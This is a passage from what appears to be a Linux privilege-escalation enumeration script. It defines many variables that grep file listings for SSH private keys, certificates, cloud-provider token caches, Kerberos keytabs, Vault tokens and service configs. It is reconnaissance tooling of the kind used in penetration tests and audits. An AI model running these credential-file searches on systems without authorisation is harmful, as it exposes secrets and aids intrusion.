"$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "ldap$" | sort | uniq | head -n 70) - PSTORAGE_LOG4SHELL=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}var|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}etc" | grep -E "log4j-core.*\.jar$" | sort | uniq | head -n 70) - PSTORAGE_OPENVPN=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) - PSTORAGE_SSH=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$|.*\.pub$" | sort | uniq | head -n 70) - PSTORAGE_CERTSB4=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/usr/share/|/usr/local/lib/|/usr/lib.*' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) - PSTORAGE_CERTSBIN=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/usr/share/|/usr/local/lib/|/usr/lib/.*|^/usr/share/|/usr/local/lib/|/usr/lib/.*' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) - PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/usr/share/|/usr/local/lib/|/usr/lib/.*' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) - PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '.dll' | grep -E "^${ROOT_FOLDER}tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) - PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) - PSTORAGE_SNYK=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "snyk\.json$|snyk\.config\.json$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "credentials\.db$|legacy_credentials\.db$|adc\.json$|\.boto$|\.credentials\.json$|firebase-tools\.json$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|gcloud$|legacy_credentials$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|clouds\.config$|service_principal_entries\.json$|msal_token_cache\.json$|msal_http_cache\.bin$|service_principal_entries\.bin$|msal_token_cache\.bin$|ErrorRecords$|TokenCache\.dat$|\.bluemix$|doctl$|Google Cloud Directory Sync$|Google Password Sync$" | sort | uniq | head -n 70) - PSTORAGE_ROAD_RECON=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.roadtools_auth$" | sort | uniq | head -n 70) - PSTORAGE_FREEIPA=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "ipa$|dirsrv$" | sort | uniq | head -n 70) - PSTORAGE_KERBEROS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "krb5\.conf$|.*\.keytab$|\.k5login$|krb5cc_.*$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KIBANA=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_GRAFANA=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "grafana\.ini$" | sort | uniq | head -n 70) - PSTORAGE_KNOCKD=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '/etc/init.d/' | grep -E "^${ROOT_FOLDER}etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) - PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "logstash$" | sort | uniq | head -n 70) - PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.vault-token$" | sort | uniq | head -n 70) - PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "couchdb$" | sort | uniq | head -n 70) - PSTORAGE_REDIS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "redis\.conf$" | sort | uniq | head -n 70) - PSTORAGE_MOSQUITTO=$(echo -e 